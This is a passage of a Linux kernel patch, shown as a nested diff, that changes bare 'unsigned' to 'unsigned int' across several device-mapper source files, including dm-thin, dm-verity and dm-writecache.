+ EXPORT_SYMBOL(dm_shift_arg);
+ 
+-void dm_consume_args(struct dm_arg_set *as, unsigned num_args)
++void dm_consume_args(struct dm_arg_set *as, unsigned int num_args)
+ {
+ 	BUG_ON(as->argc < num_args);
+ 	as->argc -= num_args;
+@@ -856,7 +855,7 @@ static int device_is_rq_stackable(struct dm_target *ti, struct dm_dev *dev,
+ 
+ static int dm_table_determine_type(struct dm_table *t)
+ {
+-	unsigned bio_based = 0, request_based = 0, hybrid = 0;
++	unsigned int bio_based = 0, request_based = 0, hybrid = 0;
+ 	struct dm_target *ti;
+ 	struct list_head *devices = dm_table_get_devices(t);
+ 	enum dm_queue_mode live_md_type = dm_get_md_type(t->md);
+@@ -1535,7 +1534,7 @@ static bool dm_table_any_dev_attr(struct dm_table *t,
+ static int count_device(struct dm_target *ti, struct dm_dev *dev,
+ 			sector_t start, sector_t len, void *data)
+ {
+-	unsigned *num_devices = data;
++	unsigned int *num_devices = data;
+ 
+ 	(*num_devices)++;
+ 
+@@ -1565,7 +1564,7 @@ bool dm_table_has_no_data_devices(struct dm_table *t)
+ {
+ 	for (unsigned int i = 0; i < t->num_targets; i++) {
+ 		struct dm_target *ti = dm_table_get_target(t, i);
+-		unsigned num_devices = 0;
++		unsigned int num_devices = 0;
+ 
+ 		if (!ti->type->iterate_devices)
+ 			return false;
+diff --git a/drivers/md/dm-thin-metadata.c b/drivers/md/dm-thin-metadata.c
+index 6bcc4c4786d89..80545ec541210 100644
+--- a/drivers/md/dm-thin-metadata.c
++++ b/drivers/md/dm-thin-metadata.c
+@@ -318,12 +318,12 @@ static void unpack_block_time(uint64_t v, dm_block_t *b, uint32_t *t)
+  */
+ typedef int (*run_fn)(struct dm_space_map *, dm_block_t, dm_block_t);
+ 
+-static void with_runs(struct dm_space_map *sm, const __le64 *value_le, unsigned count, run_fn fn)
++static void with_runs(struct dm_space_map *sm, const __le64 *value_le, unsigned int count, run_fn fn)
+ {
+ 	uint64_t b, begin, end;
+ 	uint32_t t;
+ 	bool in_run = false;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	for (i = 0; i < count; i++, value_le++) {
+ 		/* We know value_le is 8 byte aligned */
+@@ -348,13 +348,13 @@ static void with_runs(struct dm_space_map *sm, const __le64 *value_le, unsigned
+ 		fn(sm, begin, end);
+ }
+ 
+-static void data_block_inc(void *context, const void *value_le, unsigned count)
++static void data_block_inc(void *context, const void *value_le, unsigned int count)
+ {
+ 	with_runs((struct dm_space_map *) context,
+ 		  (const __le64 *) value_le, count, dm_sm_inc_blocks);
+ }
+ 
+-static void data_block_dec(void *context, const void *value_le, unsigned count)
++static void data_block_dec(void *context, const void *value_le, unsigned int count)
+ {
+ 	with_runs((struct dm_space_map *) context,
+ 		  (const __le64 *) value_le, count, dm_sm_dec_blocks);
+@@ -374,21 +374,21 @@ static int data_block_equal(void *context, const void *value1_le, const void *va
+ 	return b1 == b2;
+ }
+ 
+-static void subtree_inc(void *context, const void *value, unsigned count)
++static void subtree_inc(void *context, const void *value, unsigned int count)
+ {
+ 	struct dm_btree_info *info = context;
+ 	const __le64 *root_le = value;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	for (i = 0; i < count; i++, root_le++)
+ 		dm_tm_inc(info->tm, le64_to_cpu(*root_le));
+ }
+ 
+-static void subtree_dec(void *context, const void *value, unsigned count)
++static void subtree_dec(void *context, const void *value, unsigned int count)
+ {
+ 	struct dm_btree_info *info = context;
+ 	const __le64 *root_le = value;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	for (i = 0; i < count; i++, root_le++)
+ 		if (dm_btree_del(info, le64_to_cpu(*root_le)))
+@@ -448,10 +448,10 @@ static int superblock_lock(struct dm_pool_metadata *pmd,
+ static int __superblock_all_zeroes(struct dm_block_manager *bm, int *result)
+ {
+ 	int r;
+-	unsigned i;
++	unsigned int i;
+ 	struct dm_block *b;
+ 	__le64 *data_le, zero = cpu_to_le64(0);
+-	unsigned block_size = dm_bm_block_size(bm) / sizeof(__le64);
++	unsigned int block_size = dm_bm_block_size(bm) / sizeof(__le64);
+ 
+ 	/*
+ 	 * We can't use a validator here - it may be all zeroes.
+@@ -971,7 +971,7 @@ struct dm_pool_metadata *dm_pool_metadata_open(struct block_device *bdev,
+ int dm_pool_metadata_close(struct dm_pool_metadata *pmd)
+ {
+ 	int r;
+-	unsigned open_devices = 0;
++	unsigned int open_devices = 0;
+ 	struct dm_thin_device *td, *tmp;
+ 
+ 	down_read(&pmd->root_lock);
+@@ -1679,7 +1679,7 @@ int dm_thin_insert_block(struct dm_thin_device *td, dm_block_t block,
+ static int __remove_range(struct dm_thin_device *td, dm_block_t begin, dm_block_t end)
+ {
+ 	int r;
+-	unsigned count, total_count = 0;
++	unsigned int count, total_count = 0;
+ 	struct dm_pool_metadata *pmd = td->pmd;
+ 	dm_block_t keys[1] = { td->id };
+ 	__le64 value;
+diff --git a/drivers/md/dm-thin.c b/drivers/md/dm-thin.c
+index 90df6c3da77a2..d12aff50974a9 100644
+--- a/drivers/md/dm-thin.c
++++ b/drivers/md/dm-thin.c
+@@ -32,7 +32,7 @@
+ #define COMMIT_PERIOD HZ
+ #define NO_SPACE_TIMEOUT_SECS 60
+ 
+-static unsigned no_space_timeout_secs = NO_SPACE_TIMEOUT_SECS;
++static unsigned int no_space_timeout_secs = NO_SPACE_TIMEOUT_SECS;
+ 
+ DECLARE_DM_KCOPYD_THROTTLE_WITH_MODULE_PARM(snapshot_copy_throttle,
+ 		"A percentage of time allocated for copy on write");
+@@ -254,7 +254,7 @@ struct pool {
+ 	struct delayed_work no_space_timeout;
+ 
+ 	unsigned long last_commit_jiffies;
+-	unsigned ref_count;
++	unsigned int ref_count;
+ 
+ 	spinlock_t lock;
+ 	struct bio_list deferred_flush_bios;
+@@ -2159,7 +2159,7 @@ static void process_thin_deferred_bios(struct thin_c *tc)
+ 	struct bio *bio;
+ 	struct bio_list bios;
+ 	struct blk_plug plug;
+-	unsigned count = 0;
++	unsigned int count = 0;
+ 
+ 	if (tc->requeue_mode) {
+ 		error_thin_bio_list(tc, &tc->deferred_bio_list,
+@@ -2229,9 +2229,9 @@ static int cmp_cells(const void *lhs, const void *rhs)
+ 	return 0;
+ }
+ 
+-static unsigned sort_cells(struct pool *pool, struct list_head *cells)
++static unsigned int sort_cells(struct pool *pool, struct list_head *cells)
+ {
+-	unsigned count = 0;
++	unsigned int count = 0;
+ 	struct dm_bio_prison_cell *cell, *tmp;
+ 
+ 	list_for_each_entry_safe(cell, tmp, cells, user_list) {
+@@ -2252,7 +2252,7 @@ static void process_thin_deferred_cells(struct thin_c *tc)
+ 	struct pool *pool = tc->pool;
+ 	struct list_head cells;
+ 	struct dm_bio_prison_cell *cell;
+-	unsigned i, j, count;
++	unsigned int i, j, count;
+ 
+ 	INIT_LIST_HEAD(&cells);
+ 
+@@ -3115,7 +3115,7 @@ static int parse_pool_features(struct dm_arg_set *as, struct pool_features *pf,
+ 			       struct dm_target *ti)
+ {
+ 	int r;
+-	unsigned argc;
++	unsigned int argc;
+ 	const char *arg_name;
+ 
+ 	static const struct dm_arg _args[] = {
+@@ -3252,7 +3252,7 @@ static dm_block_t calc_metadata_threshold(struct pool_c *pt)
+  *	     read_only: Don't allow any changes to be made to the pool metadata.
+  *	     error_if_no_space: error IOs, instead of queueing, if no space.
+  */
+-static int pool_ctr(struct dm_target *ti, unsigned argc, char **argv)
++static int pool_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ {
+ 	int r, pool_created = 0;
+ 	struct pool_c *pt;
+@@ -3648,7 +3648,7 @@ static void pool_postsuspend(struct dm_target *ti)
+ 	(void) commit(pool);
+ }
+ 
+-static int check_arg_count(unsigned argc, unsigned args_required)
++static int check_arg_count(unsigned int argc, unsigned int args_required)
+ {
+ 	if (argc != args_required) {
+ 		DMWARN("Message received with %u arguments instead of %u.",
+@@ -3671,7 +3671,7 @@ static int read_dev_id(char *arg, dm_thin_id *dev_id, int warning)
+ 	return -EINVAL;
+ }
+ 
+-static int process_create_thin_mesg(unsigned argc, char **argv, struct pool *pool)
++static int process_create_thin_mesg(unsigned int argc, char **argv, struct pool *pool)
+ {
+ 	dm_thin_id dev_id;
+ 	int r;
+@@ -3694,7 +3694,7 @@ static int process_create_thin_mesg(unsigned argc, char **argv, struct pool *poo
+ 	return 0;
+ }
+ 
+-static int process_create_snap_mesg(unsigned argc, char **argv, struct pool *pool)
++static int process_create_snap_mesg(unsigned int argc, char **argv, struct pool *pool)
+ {
+ 	dm_thin_id dev_id;
+ 	dm_thin_id origin_dev_id;
+@@ -3722,7 +3722,7 @@ static int process_create_snap_mesg(unsigned argc, char **argv, struct pool *poo
+ 	return 0;
+ }
+ 
+-static int process_delete_mesg(unsigned argc, char **argv, struct pool *pool)
++static int process_delete_mesg(unsigned int argc, char **argv, struct pool *pool)
+ {
+ 	dm_thin_id dev_id;
+ 	int r;
+@@ -3742,7 +3742,7 @@ static int process_delete_mesg(unsigned argc, char **argv, struct pool *pool)
+ 	return r;
+ }
+ 
+-static int process_set_transaction_id_mesg(unsigned argc, char **argv, struct pool *pool)
++static int process_set_transaction_id_mesg(unsigned int argc, char **argv, struct pool *pool)
+ {
+ 	dm_thin_id old_id, new_id;
+ 	int r;
+@@ -3771,7 +3771,7 @@ static int process_set_transaction_id_mesg(unsigned argc, char **argv, struct po
+ 	return 0;
+ }
+ 
+-static int process_reserve_metadata_snap_mesg(unsigned argc, char **argv, struct pool *pool)
++static int process_reserve_metadata_snap_mesg(unsigned int argc, char **argv, struct pool *pool)
+ {
+ 	int r;
+ 
+@@ -3788,7 +3788,7 @@ static int process_reserve_metadata_snap_mesg(unsigned argc, char **argv, struct
+ 	return r;
+ }
+ 
+-static int process_release_metadata_snap_mesg(unsigned argc, char **argv, struct pool *pool)
++static int process_release_metadata_snap_mesg(unsigned int argc, char **argv, struct pool *pool)
+ {
+ 	int r;
+ 
+@@ -3812,8 +3812,8 @@ static int process_release_metadata_snap_mesg(unsigned argc, char **argv, struct
+  *   reserve_metadata_snap
+  *   release_metadata_snap
+  */
+-static int pool_message(struct dm_target *ti, unsigned argc, char **argv,
+-			char *result, unsigned maxlen)
++static int pool_message(struct dm_target *ti, unsigned int argc, char **argv,
++			char *result, unsigned int maxlen)
+ {
+ 	int r = -EINVAL;
+ 	struct pool_c *pt = ti->private;
+@@ -3853,9 +3853,9 @@ static int pool_message(struct dm_target *ti, unsigned argc, char **argv,
+ }
+ 
+ static void emit_flags(struct pool_features *pf, char *result,
+-		       unsigned sz, unsigned maxlen)
++		       unsigned int sz, unsigned int maxlen)
+ {
+-	unsigned count = !pf->zero_new_blocks + !pf->discard_enabled +
++	unsigned int count = !pf->zero_new_blocks + !pf->discard_enabled +
+ 		!pf->discard_passdown + (pf->mode == PM_READ_ONLY) +
+ 		pf->error_if_no_space;
+ 	DMEMIT("%u ", count);
+@@ -3883,10 +3883,10 @@ static void emit_flags(struct pool_features *pf, char *result,
+  *    <pool mode> <discard config> <no space config> <needs_check>
+  */
+ static void pool_status(struct dm_target *ti, status_type_t type,
+-			unsigned status_flags, char *result, unsigned maxlen)
++			unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	int r;
+-	unsigned sz = 0;
++	unsigned int sz = 0;
+ 	uint64_t transaction_id;
+ 	dm_block_t nr_free_blocks_data;
+ 	dm_block_t nr_free_blocks_metadata;
+@@ -4148,7 +4148,7 @@ static void thin_dtr(struct dm_target *ti)
+  * If the pool device has discards disabled, they get disabled for the thin
+  * device as well.
+  */
+-static int thin_ctr(struct dm_target *ti, unsigned argc, char **argv)
++static int thin_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ {
+ 	int r;
+ 	struct thin_c *tc;
+@@ -4371,7 +4371,7 @@ static int thin_preresume(struct dm_target *ti)
+  * <nr mapped sectors> <highest mapped sector>
+  */
+ static void thin_status(struct dm_target *ti, status_type_t type,
+-			unsigned status_flags, char *result, unsigned maxlen)
++			unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	int r;
+ 	ssize_t sz = 0;
+diff --git a/drivers/md/dm-uevent.c b/drivers/md/dm-uevent.c
+index 8671267200d88..a02b3f6ea47a8 100644
+--- a/drivers/md/dm-uevent.c
++++ b/drivers/md/dm-uevent.c
+@@ -60,7 +60,7 @@ static struct dm_uevent *dm_build_path_uevent(struct mapped_device *md,
+ 					      enum kobject_action action,
+ 					      const char *dm_action,
+ 					      const char *path,
+-					      unsigned nr_valid_paths)
++					      unsigned int nr_valid_paths)
+ {
+ 	struct dm_uevent *event;
+ 
+@@ -168,7 +168,7 @@ EXPORT_SYMBOL_GPL(dm_send_uevents);
+  *
+  */
+ void dm_path_uevent(enum dm_uevent_type event_type, struct dm_target *ti,
+-		   const char *path, unsigned nr_valid_paths)
++		   const char *path, unsigned int nr_valid_paths)
+ {
+ 	struct mapped_device *md = dm_table_get_md(ti->table);
+ 	struct dm_uevent *event;
+diff --git a/drivers/md/dm-uevent.h b/drivers/md/dm-uevent.h
+index d30d226f2a181..2c9ba561fd8e9 100644
+--- a/drivers/md/dm-uevent.h
++++ b/drivers/md/dm-uevent.h
+@@ -20,7 +20,7 @@ extern void dm_uevent_exit(void);
+ extern void dm_send_uevents(struct list_head *events, struct kobject *kobj);
+ extern void dm_path_uevent(enum dm_uevent_type event_type,
+ 			   struct dm_target *ti, const char *path,
+-			   unsigned nr_valid_paths);
++			   unsigned int nr_valid_paths);
+ 
+ #else
+ 
+@@ -37,7 +37,7 @@ static inline void dm_send_uevents(struct list_head *events,
+ }
+ static inline void dm_path_uevent(enum dm_uevent_type event_type,
+ 				  struct dm_target *ti, const char *path,
+-				  unsigned nr_valid_paths)
++				  unsigned int nr_valid_paths)
+ {
+ }
+ 
+diff --git a/drivers/md/dm-verity-fec.c b/drivers/md/dm-verity-fec.c
+index 23cffce564035..962fc32c947c5 100644
+--- a/drivers/md/dm-verity-fec.c
++++ b/drivers/md/dm-verity-fec.c
+@@ -59,14 +59,14 @@ static int fec_decode_rs8(struct dm_verity *v, struct dm_verity_fec_io *fio,
+  * to the data block. Caller is responsible for releasing buf.
+  */
+ static u8 *fec_read_parity(struct dm_verity *v, u64 rsb, int index,
+-			   unsigned *offset, struct dm_buffer **buf)
++			   unsigned int *offset, struct dm_buffer **buf)
+ {
+ 	u64 position, block, rem;
+ 	u8 *res;
+ 
+ 	position = (index + rsb) * v->fec->roots;
+ 	block = div64_u64_rem(position, v->fec->io_size, &rem);
+-	*offset = (unsigned)rem;
++	*offset = (unsigned int)rem;
+ 
+ 	res = dm_bufio_read(v->fec->bufio, block, buf);
+ 	if (IS_ERR(res)) {
+@@ -102,7 +102,7 @@ static u8 *fec_read_parity(struct dm_verity *v, u64 rsb, int index,
+  */
+ static inline u8 *fec_buffer_rs_block(struct dm_verity *v,
+ 				      struct dm_verity_fec_io *fio,
+-				      unsigned i, unsigned j)
++				      unsigned int i, unsigned int j)
+ {
+ 	return &fio->bufs[i][j * v->fec->rsn];
+ }
+@@ -111,7 +111,7 @@ static inline u8 *fec_buffer_rs_block(struct dm_verity *v,
+  * Return an index to the current RS block when called inside
+  * fec_for_each_buffer_rs_block.
+  */
+-static inline unsigned fec_buffer_rs_index(unsigned i, unsigned j)
++static inline unsigned int fec_buffer_rs_index(unsigned int i, unsigned int j)
+ {
+ 	return (i << DM_VERITY_FEC_BUF_RS_BITS) + j;
+ }
+@@ -121,12 +121,12 @@ static inline unsigned fec_buffer_rs_index(unsigned i, unsigned j)
+  * starting from block_offset.
+  */
+ static int fec_decode_bufs(struct dm_verity *v, struct dm_verity_fec_io *fio,
+-			   u64 rsb, int byte_index, unsigned block_offset,
++			   u64 rsb, int byte_index, unsigned int block_offset,
+ 			   int neras)
+ {
+ 	int r, corrected = 0, res;
+ 	struct dm_buffer *buf;
+-	unsigned n, i, offset;
++	unsigned int n, i, offset;
+ 	u8 *par, *block;
+ 
+ 	par = fec_read_parity(v, rsb, block_offset, &offset, &buf);
+@@ -197,7 +197,7 @@ static int fec_is_erasure(struct dm_verity *v, struct dm_verity_io *io,
+  * fits into buffers. Check for erasure locations if @neras is non-NULL.
+  */
+ static int fec_read_bufs(struct dm_verity *v, struct dm_verity_io *io,
+-			 u64 rsb, u64 target, unsigned block_offset,
++			 u64 rsb, u64 target, unsigned int block_offset,
+ 			 int *neras)
+ {
+ 	bool is_zero;
+@@ -208,7 +208,7 @@ static int fec_read_bufs(struct dm_verity *v, struct dm_verity_io *io,
+ 	u64 block, ileaved;
+ 	u8 *bbuf, *rs_block;
+ 	u8 want_digest[HASH_MAX_DIGESTSIZE];
+-	unsigned n, k;
++	unsigned int n, k;
+ 
+ 	if (neras)
+ 		*neras = 0;
+@@ -304,7 +304,7 @@ done:
+  */
+ static int fec_alloc_bufs(struct dm_verity *v, struct dm_verity_fec_io *fio)
+ {
+-	unsigned n;
++	unsigned int n;
+ 
+ 	if (!fio->rs)
+ 		fio->rs = mempool_alloc(&v->fec->rs_pool, GFP_NOIO);
+@@ -344,7 +344,7 @@ static int fec_alloc_bufs(struct dm_verity *v, struct dm_verity_fec_io *fio)
+  */
+ static void fec_init_bufs(struct dm_verity *v, struct dm_verity_fec_io *fio)
+ {
+-	unsigned n;
++	unsigned int n;
+ 
+ 	fec_for_each_buffer(fio, n)
+ 		memset(fio->bufs[n], 0, v->fec->rsn << DM_VERITY_FEC_BUF_RS_BITS);
+@@ -362,7 +362,7 @@ static int fec_decode_rsb(struct dm_verity *v, struct dm_verity_io *io,
+ 			  bool use_erasures)
+ {
+ 	int r, neras = 0;
+-	unsigned pos;
++	unsigned int pos;
+ 
+ 	r = fec_alloc_bufs(v, fio);
+ 	if (unlikely(r < 0))
+@@ -484,7 +484,7 @@ done:
+  */
+ void verity_fec_finish_io(struct dm_verity_io *io)
+ {
+-	unsigned n;
++	unsigned int n;
+ 	struct dm_verity_fec *f = io->v->fec;
+ 	struct dm_verity_fec_io *fio = fec_io(io);
+ 
+@@ -522,8 +522,8 @@ void verity_fec_init_io(struct dm_verity_io *io)
+ /*
+  * Append feature arguments and values to the status table.
+  */
+-unsigned verity_fec_status_table(struct dm_verity *v, unsigned sz,
+-				 char *result, unsigned maxlen)
++unsigned int verity_fec_status_table(struct dm_verity *v, unsigned int sz,
++				 char *result, unsigned int maxlen)
+ {
+ 	if (!verity_fec_is_enabled(v))
+ 		return sz;
+@@ -589,7 +589,7 @@ bool verity_is_fec_opt_arg(const char *arg_name)
+ }
+ 
+ int verity_fec_parse_opt_args(struct dm_arg_set *as, struct dm_verity *v,
+-			      unsigned *argc, const char *arg_name)
++			      unsigned int *argc, const char *arg_name)
+ {
+ 	int r;
+ 	struct dm_target *ti = v->ti;
+diff --git a/drivers/md/dm-verity-fec.h b/drivers/md/dm-verity-fec.h
+index 3c46c8d618833..8454070d28242 100644
+--- a/drivers/md/dm-verity-fec.h
++++ b/drivers/md/dm-verity-fec.h
+@@ -55,10 +55,10 @@ struct dm_verity_fec_io {
+ 	struct rs_control *rs;	/* Reed-Solomon state */
+ 	int erasures[DM_VERITY_FEC_MAX_RSN];	/* erasures for decode_rs8 */
+ 	u8 *bufs[DM_VERITY_FEC_BUF_MAX];	/* bufs for deinterleaving */
+-	unsigned nbufs;		/* number of buffers allocated */
++	unsigned int nbufs;		/* number of buffers allocated */
+ 	u8 *output;		/* buffer for corrected output */
+ 	size_t output_pos;
+-	unsigned level;		/* recursion level */
++	unsigned int level;		/* recursion level */
+ };
+ 
+ #ifdef CONFIG_DM_VERITY_FEC
+@@ -72,15 +72,15 @@ extern int verity_fec_decode(struct dm_verity *v, struct dm_verity_io *io,
+ 			     enum verity_block_type type, sector_t block,
+ 			     u8 *dest, struct bvec_iter *iter);
+ 
+-extern unsigned verity_fec_status_table(struct dm_verity *v, unsigned sz,
+-					char *result, unsigned maxlen);
++extern unsigned int verity_fec_status_table(struct dm_verity *v, unsigned int sz,
++					char *result, unsigned int maxlen);
+ 
+ extern void verity_fec_finish_io(struct dm_verity_io *io);
+ extern void verity_fec_init_io(struct dm_verity_io *io);
+ 
+ extern bool verity_is_fec_opt_arg(const char *arg_name);
+ extern int verity_fec_parse_opt_args(struct dm_arg_set *as,
+-				     struct dm_verity *v, unsigned *argc,
++				     struct dm_verity *v, unsigned int *argc,
+ 				     const char *arg_name);
+ 
+ extern void verity_fec_dtr(struct dm_verity *v);
+@@ -106,9 +106,9 @@ static inline int verity_fec_decode(struct dm_verity *v,
+ 	return -EOPNOTSUPP;
+ }
+ 
+-static inline unsigned verity_fec_status_table(struct dm_verity *v,
+-					       unsigned sz, char *result,
+-					       unsigned maxlen)
++static inline unsigned int verity_fec_status_table(struct dm_verity *v,
++					       unsigned int sz, char *result,
++					       unsigned int maxlen)
+ {
+ 	return sz;
+ }
+@@ -128,7 +128,7 @@ static inline bool verity_is_fec_opt_arg(const char *arg_name)
+ 
+ static inline int verity_fec_parse_opt_args(struct dm_arg_set *as,
+ 					    struct dm_verity *v,
+-					    unsigned *argc,
++					    unsigned int *argc,
+ 					    const char *arg_name)
+ {
+ 	return -EINVAL;
+diff --git a/drivers/md/dm-verity-target.c b/drivers/md/dm-verity-target.c
+index ccf5b852fbf7a..64e8ac429984d 100644
+--- a/drivers/md/dm-verity-target.c
++++ b/drivers/md/dm-verity-target.c
+@@ -41,7 +41,7 @@
+ #define DM_VERITY_OPTS_MAX		(4 + DM_VERITY_OPTS_FEC + \
+ 					 DM_VERITY_ROOT_HASH_VERIFICATION_OPTS)
+ 
+-static unsigned dm_verity_prefetch_cluster = DM_VERITY_DEFAULT_PREFETCH_SIZE;
++static unsigned int dm_verity_prefetch_cluster = DM_VERITY_DEFAULT_PREFETCH_SIZE;
+ 
+ module_param_named(prefetch_cluster, dm_verity_prefetch_cluster, uint, S_IRUGO | S_IWUSR);
+ 
+@@ -51,7 +51,7 @@ struct dm_verity_prefetch_work {
+ 	struct work_struct work;
+ 	struct dm_verity *v;
+ 	sector_t block;
+-	unsigned n_blocks;
++	unsigned int n_blocks;
+ };
+ 
+ /*
+@@ -196,10 +196,10 @@ out:
+ }
+ 
+ static void verity_hash_at_level(struct dm_verity *v, sector_t block, int level,
+-				 sector_t *hash_block, unsigned *offset)
++				 sector_t *hash_block, unsigned int *offset)
+ {
+ 	sector_t position = verity_position_at_level(v, block, level);
+-	unsigned idx;
++	unsigned int idx;
+ 
+ 	*hash_block = v->hash_level_block[level] + (position >> v->hash_per_block_bits);
+ 
+@@ -287,7 +287,7 @@ static int verity_verify_level(struct dm_verity *v, struct dm_verity_io *io,
+ 	u8 *data;
+ 	int r;
+ 	sector_t hash_block;
+-	unsigned offset;
++	unsigned int offset;
+ 
+ 	verity_hash_at_level(v, block, level, &hash_block, &offset);
+ 
+@@ -445,13 +445,13 @@ int verity_for_bv_block(struct dm_verity *v, struct dm_verity_io *io,
+ 				       struct dm_verity_io *io, u8 *data,
+ 				       size_t len))
+ {
+-	unsigned todo = 1 << v->data_dev_block_bits;
++	unsigned int todo = 1 << v->data_dev_block_bits;
+ 	struct bio *bio = dm_bio_from_per_bio_data(io, v->ti->per_io_data_size);
+ 
+ 	do {
+ 		int r;
+ 		u8 *page;
+-		unsigned len;
++		unsigned int len;
+ 		struct bio_vec bv = bio_iter_iovec(bio, *iter);
+ 
+ 		page = bvec_kmap_local(&bv);
+@@ -688,7 +688,7 @@ static void verity_prefetch_io(struct work_struct *work)
+ 		verity_hash_at_level(v, pw->block, i, &hash_block_start, NULL);
+ 		verity_hash_at_level(v, pw->block + pw->n_blocks - 1, i, &hash_block_end, NULL);
+ 		if (!i) {
+-			unsigned cluster = READ_ONCE(dm_verity_prefetch_cluster);
++			unsigned int cluster = READ_ONCE(dm_verity_prefetch_cluster);
+ 
+ 			cluster >>= v->data_dev_block_bits;
+ 			if (unlikely(!cluster))
+@@ -753,7 +753,7 @@ static int verity_map(struct dm_target *ti, struct bio *bio)
+ 	bio_set_dev(bio, v->data_dev->bdev);
+ 	bio->bi_iter.bi_sector = verity_map_sector(v, bio->bi_iter.bi_sector);
+ 
+-	if (((unsigned)bio->bi_iter.bi_sector | bio_sectors(bio)) &
++	if (((unsigned int)bio->bi_iter.bi_sector | bio_sectors(bio)) &
+ 	    ((1 << (v->data_dev_block_bits - SECTOR_SHIFT)) - 1)) {
+ 		DMERR_LIMIT("unaligned io");
+ 		return DM_MAPIO_KILL;
+@@ -789,12 +789,12 @@ static int verity_map(struct dm_target *ti, struct bio *bio)
+  * Status: V (valid) or C (corruption found)
+  */
+ static void verity_status(struct dm_target *ti, status_type_t type,
+-			  unsigned status_flags, char *result, unsigned maxlen)
++			  unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	struct dm_verity *v = ti->private;
+-	unsigned args = 0;
+-	unsigned sz = 0;
+-	unsigned x;
++	unsigned int args = 0;
++	unsigned int sz = 0;
++	unsigned int x;
+ 
+ 	switch (type) {
+ 	case STATUSTYPE_INFO:
+@@ -1054,7 +1054,7 @@ static int verity_parse_opt_args(struct dm_arg_set *as, struct dm_verity *v,
+ 				 bool only_modifier_opts)
+ {
+ 	int r = 0;
+-	unsigned argc;
++	unsigned int argc;
+ 	struct dm_target *ti = v->ti;
+ 	const char *arg_name;
+ 
+@@ -1156,7 +1156,7 @@ static int verity_parse_opt_args(struct dm_arg_set *as, struct dm_verity *v,
+  *	<digest>
+  *	<salt>		Hex string or "-" if no salt.
+  */
+-static int verity_ctr(struct dm_target *ti, unsigned argc, char **argv)
++static int verity_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ {
+ 	struct dm_verity *v;
+ 	struct dm_verity_sig_opts verify_args = {0};
+diff --git a/drivers/md/dm-verity.h b/drivers/md/dm-verity.h
+index 98f306ec6a33d..2f555b4203679 100644
+--- a/drivers/md/dm-verity.h
++++ b/drivers/md/dm-verity.h
+@@ -42,7 +42,7 @@ struct dm_verity {
+ 	u8 *root_digest;	/* digest of the root block */
+ 	u8 *salt;		/* salt: its size is salt_size */
+ 	u8 *zero_digest;	/* digest for a zero block */
+-	unsigned salt_size;
++	unsigned int salt_size;
+ 	sector_t data_start;	/* data offset in 512-byte sectors */
+ 	sector_t hash_start;	/* hash start in blocks */
+ 	sector_t data_blocks;	/* the number of data blocks */
+@@ -54,10 +54,10 @@ struct dm_verity {
+ 	unsigned char version;
+ 	bool hash_failed:1;	/* set if hash of any block failed */
+ 	bool use_tasklet:1;	/* try to verify in tasklet before work-queue */
+-	unsigned digest_size;	/* digest size for the current hash algorithm */
++	unsigned int digest_size;	/* digest size for the current hash algorithm */
+ 	unsigned int ahash_reqsize;/* the size of temporary space for crypto */
+ 	enum verity_mode mode;	/* mode for handling verification errors */
+-	unsigned corrupted_errs;/* Number of errors for corrupted blocks */
++	unsigned int corrupted_errs;/* Number of errors for corrupted blocks */
+ 
+ 	struct workqueue_struct *verify_wq;
+ 
+@@ -77,7 +77,7 @@ struct dm_verity_io {
+ 	bio_end_io_t *orig_bi_end_io;
+ 
+ 	sector_t block;
+-	unsigned n_blocks;
++	unsigned int n_blocks;
+ 	bool in_tasklet;
+ 
+ 	struct bvec_iter iter;
+diff --git a/drivers/md/dm-writecache.c b/drivers/md/dm-writecache.c
+index 96a003eb73234..431c84595ddb7 100644
+--- a/drivers/md/dm-writecache.c
++++ b/drivers/md/dm-writecache.c
+@@ -128,9 +128,9 @@ struct dm_writecache {
+ 	unsigned long max_age;
+ 	unsigned long pause;
+ 
+-	unsigned uncommitted_blocks;
+-	unsigned autocommit_blocks;
+-	unsigned max_writeback_jobs;
++	unsigned int uncommitted_blocks;
++	unsigned int autocommit_blocks;
++	unsigned int max_writeback_jobs;
+ 
+ 	int error;
+ 
+@@ -155,7 +155,7 @@ struct dm_writecache {
+ 	sector_t data_device_sectors;
+ 	void *block_start;
+ 	struct wc_entry *entries;
+-	unsigned block_size;
++	unsigned int block_size;
+ 	unsigned char block_size_bits;
+ 
+ 	bool pmem_mode:1;
+@@ -178,13 +178,13 @@ struct dm_writecache {
+ 	bool metadata_only:1;
+ 	bool pause_set:1;
+ 
+-	unsigned high_wm_percent_value;
+-	unsigned low_wm_percent_value;
+-	unsigned autocommit_time_value;
+-	unsigned max_age_value;
+-	unsigned pause_value;
++	unsigned int high_wm_percent_value;
++	unsigned int low_wm_percent_value;
++	unsigned int autocommit_time_value;
++	unsigned int max_age_value;
++	unsigned int pause_value;
+ 
+-	unsigned writeback_all;
++	unsigned int writeback_all;
+ 	struct workqueue_struct *writeback_wq;
+ 	struct work_struct writeback_work;
+ 	struct work_struct flush_work;
+@@ -202,7 +202,7 @@ struct dm_writecache {
+ 
+ 	struct dm_kcopyd_client *dm_kcopyd;
+ 	unsigned long *dirty_bitmap;
+-	unsigned dirty_bitmap_size;
++	unsigned int dirty_bitmap_size;
+ 
+ 	struct bio_set bio_set;
+ 	mempool_t copy_pool;
+@@ -227,7 +227,7 @@ struct writeback_struct {
+ 	struct list_head endio_entry;
+ 	struct dm_writecache *wc;
+ 	struct wc_entry **wc_list;
+-	unsigned wc_list_n;
++	unsigned int wc_list_n;
+ 	struct wc_entry *wc_list_inline[WB_LIST_INLINE];
+ 	struct bio bio;
+ };
+@@ -236,7 +236,7 @@ struct copy_struct {
+ 	struct list_head endio_entry;
+ 	struct dm_writecache *wc;
+ 	struct wc_entry *e;
+-	unsigned n_entries;
++	unsigned int n_entries;
+ 	int error;
+ };
+ 
+@@ -369,7 +369,7 @@ static struct page *persistent_memory_page(void *addr)
+ 		return virt_to_page(addr);
+ }
+ 
+-static unsigned persistent_memory_page_offset(void *addr)
++static unsigned int persistent_memory_page_offset(void *addr)
+ {
+ 	return (unsigned long)addr & (PAGE_SIZE - 1);
+ }
